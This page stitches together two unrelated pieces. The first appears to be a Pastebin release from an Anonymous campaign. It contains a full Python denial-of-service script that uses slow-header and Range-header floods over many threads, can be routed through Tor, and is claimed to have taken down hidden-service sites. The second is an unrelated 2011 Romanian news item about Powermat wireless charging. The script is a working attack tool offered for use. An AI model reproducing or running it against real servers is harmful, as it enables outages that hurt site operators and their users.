Pedo Gun - PEW PEW - Anonymous DDOSer #!/usr/bin/python # this assumes you have the socks.py (http://phiral.net/socks.py) # and terminal.py (http://phiral.net/terminal.py). DDoS used to take out Hidden Wiki and # Freedom Hosting sites. Based of Tor Hammer by entropy. Uses SLLLLLLOOOOW HEADERS # Chris H. [redacted to avoid copyright issues] attack import os import re import time import sys import random import math import getopt import socks import string import terminal from threading import Thread global stop_now global term stop_now = False term = terminal.TerminalController() useragents = [ "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", "Opera/9.20 (Windows NT 6.0; U; en)", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13", "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7" ] class httpPost(Thread): def __init__(self, host, port, tor): Thread.__init__(self) self.host = host self.port = port self.socks = socks.socksocket() self.tor = tor self.running = True def _send_http_post(self, pause=10): global stop_now self.socks.send("GET / HTTP/1.1\r\n" "Host: %s\r\n" "User-Agent: %s\r\n" "Connection: keep-alive\r\n" "Keep-Alive: 900\r\n" "Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-" "Accept-Encoding: gzip, deflate, compress" % (self.host, random.choice(useragents))) for i in range(0, 9999): if stop_now: self.running = False break p = "X-"+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+random.choice(string.letters+string.digits)+": "+random.choice(string.letters+string.digits) print term.BOL+term.UP+term.CLEAR_EOL+"HEADER: %s" % p+term.NORMAL self.socks.send(p+"\r\n") time.sleep(random.uniform(30, 40)) self.socks.close() def run(self): while self.running: while self.running: try: if self.tor: self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) self.socks.connect((self.host, self.port)) print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL break except Exception, e: if e.args[0] == 106 or e.args[0] == 60: break print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL time.sleep(1) continue while self.running: try: self._send_http_post() except Exception, e: if e.args[0] == 32 or e.args[0] == 104: print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL self.socks = socks.socksocket() break time.sleep(0.1) pass def usage(): print "./ch.py -t <target> [-r <threads> -p <port> -T -h]" print " -t|--target <Hostname|IP>" print " -r|--threads <Number of threads> Defaults to 256" print " -p|--port <Web Server Port> Defaults to 80" print " -h|--help Shows this help\n" print "Eg. ./ch.py -t 192.168.1.100 -r 256\n" def main(argv): try: opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="]) except getopt.GetoptError: usage() sys.exit(-1) global stop_now target = '' threads = 256 tor = False port = 80 for o, a in opts: if o in ("-h", "--help"): usage() sys.exit(0) if o in ("-t", "--target"): target = a elif o in ("-r", "--threads"): threads = int(a) elif o in ("-p", "--port"): port = int(a) if target == '' or int(threads) <= 0: usage() sys.exit(-1) print term.DOWN + term.RED + "/*" + term.NORMAL print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL print term.RED + " * Threads: %d" % (threads) + term.NORMAL print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL rthreads = [] for i in range(threads): t = httpPost(target, port, tor) rthreads.append(t) t.start() while len(rthreads) > 0: try: rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()] except KeyboardInterrupt: print "\nShutting down threads...\n" for t in rthreads: stop_now = True t.running = False if __name__ == "__main__": print "\n/*" print "********" print "*"+term.RED + " To Catch a Predator "+term.NORMAL+"*" print "********" print " */\n" main(sys.argv[1:]) Pastebin: #OpDarkNet - Offical Release: Pedo Gun - PEW PEW - Pastebin.com

Incarcarea wireless a devenit realitate de Radu Eftimie | 21 octombrie 2011 Probabil ca multi sunt de acord cu afirmatia ca nimic nu poate fi mai rau intr-o in care agenda ta este plina decat sa ramai fara baterie la telefonul mobil. Aceasta problema pare sa-si fi gasit deja rezolvarea, gratie tehnologiei Powermat, care asigura incarcarea dispozitivelor mobile on-the-go, scrie Mashable. Tehnologia wireless (fara fir) de incarcare a bateriilor exista din 2009, iar de atunci si pana in prezent compania incearca sa imbunatateasca sistemul. Powermat functioneaza pe principiul transferului de energie prin inductia magnetica. Energia este tranferata de la un emitator integrat in suportul de baza al dispozitivului revolutionar catre un receptor care se ataseaza (prin mufa dedicata) telefonului sau altui gadget care trebuie incarcat. Transferul de energie care se face prin intermediul campului magnetic este intrerupt automat in momentul in care bateria device-ului este incarcata total, pentru a se evita pierderea de energie. In viitor, compania, care acum conlucreaza cu Duracell, General Motors si alte nume mari din mai multe domenii, spune ca sistemul de incarcare wireless va deveni disponibil in aeroporturi, hoteluri, cafenele, birourile companiilor, dar si in fiecare casa. Powermat mai afirma ca tehnologia va deveni dominanta peste 10 ani. Sursa si video: Incarcarea wireless a devenit realitate | Hit.ro